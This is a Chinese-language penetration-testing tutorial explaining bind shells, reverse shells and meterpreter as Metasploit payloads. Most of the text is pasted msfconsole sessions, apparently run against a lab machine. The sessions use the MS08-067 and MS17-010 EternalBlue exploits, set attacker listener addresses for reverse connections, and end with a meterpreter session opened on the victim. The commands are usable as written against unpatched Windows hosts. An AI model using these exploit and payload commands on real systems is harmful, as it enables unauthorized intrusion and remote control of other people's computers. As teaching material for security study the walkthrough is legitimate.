介绍几种常见的payload,并且以漏洞利用的角度探讨它们的功能
bind shell
bind(绑定型)shell用于提供远程shell连接。在成功利用了目标主机上的安全漏洞后,并且成功执行了shellcode程序以后,渗透人员可在目标主机上的特定端口上运行bind shell,以让其他主机继续控制这台主机。攻击人员可以使用基于TCP连接的标准输入输出隧道工具(例如Netcat)连接带被攻破的主机,通过bind shell继续实施控制。它的应用场合与Telnet服务器/客户端十分相似,主要适用于以NAT方式连入网络的渗透人员、攻击人员的设备与目标主机之间有防火墙的情况,即适用于无法从被测主机直接连接到攻击人员主机IP的各种情况。
msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.14 rhosts => 192.168.1.14 msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp PAYLOAD => windows/shell/bind_tcp msf5 exploit(windows/smb/ms08_067_netapi) > exploit [*] 192.168.1.14:445 - Automatically detecting the target...
metasploit通过集成的payload处理程序自动连接到bind shell。我们可以自己编写shellcode。利用exploit程序安装bind shell,然后再通过Netcat这类第三方工具连接到bind shell。
reverse shell
reverse(反射型)shell与绑定型(bind)shell截然不同。reverse shell不是在目标机器上绑定端口,被动地受理攻击人员的机器连接,而是采用反弹的方法,让被测主机主动的连接攻击者的IP和端口,并提供一个shell。reverse shell适用于被测主机采用NAT方式连接网络的情况,或者被测主机受防火墙保护而使渗透人员不能从外网直接访问被测主机的各种情况。
msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.14 rhosts => 192.168.1.14 msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell set PAYLOAD windows/shell/bind_hidden_ipknock_tcp set PAYLOAD windows/shell/reverse_ord_tcp set PAYLOAD windows/shell/bind_hidden_tcp set PAYLOAD windows/shell/reverse_tcp set PAYLOAD windows/shell/bind_ipv6_tcp set PAYLOAD windows/shell/reverse_tcp_allports set PAYLOAD windows/shell/bind_ipv6_tcp_uuid set PAYLOAD windows/shell/reverse_tcp_dns set PAYLOAD windows/shell/bind_named_pipe set PAYLOAD windows/shell/reverse_tcp_rc4 set PAYLOAD windows/shell/bind_nonx_tcp set PAYLOAD windows/shell/reverse_tcp_uuid set PAYLOAD windows/shell/bind_tcp set PAYLOAD windows/shell/reverse_udp set PAYLOAD windows/shell/bind_tcp_rc4 set PAYLOAD windows/shell_bind_tcp set PAYLOAD windows/shell/bind_tcp_uuid set PAYLOAD windows/shell_hidden_bind_tcp set PAYLOAD windows/shell/reverse_ipv6_tcp set PAYLOAD windows/shell_reverse_tcp set PAYLOAD windows/shell/reverse_nonx_tcp msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf5 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.14 yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.1.12 lhost => 192.168.1.12 msf5 exploit(windows/smb/ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.1.12:4444
注意,在安装reverse shell时需要设置攻击者的IP(LHOST)。
meterpreter
meterpreter是一种先进的、隐蔽的、多功能的、可动态扩展的payload,它可在目标主机的系统内存里注入DLL(注入的DLL完全不会以文件形式存在)。此外,它还支持在运行期间加载脚本和插件。在漏洞利用的后期阶段,它的动态加载特性极大地拓宽了渗透人员的作业空间,方便了提权、保存系统账号、进行关键记录、驻留性后门顾问、开启远程桌面等各种操作。默认情况下,meterpreter shell会采用全程加密的通行方式。
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD 15 PAYLOAD => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.14 yes The target address range or CIDR identifier RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.12 lhost => 192.168.1.12 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.1.12:4444 [+] 192.168.1.14:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.1.14:445 - Connecting to target for exploitation. [+] 192.168.1.14:445 - Connection established for exploitation. [+] 192.168.1.14:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.14:445 - CORE raw buffer dump (42 bytes) [*] 192.168.1.14:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.1.14:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.1.14:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.1.14:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.14:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.14:445 - Sending all but last fragment of exploit packet [*] 192.168.1.14:445 - Starting non-paged pool grooming [+] 192.168.1.14:445 - Sending SMBv2 buffers [+] 192.168.1.14:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.14:445 - Sending final SMBv2 buffers. [*] 192.168.1.14:445 - Sending last fragment of exploit packet! [*] 192.168.1.14:445 - Receiving response from exploit packet [+] 192.168.1.14:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.14:445 - Sending egg to corrupted connection. [*] 192.168.1.14:445 - Triggering free of corrupted buffer. [*] Sending stage (206403 bytes) to 192.168.1.14 [*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:49398) at 2021-02-01 12:13:06 +0800 [+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > dir Listing: C:\Windows\system32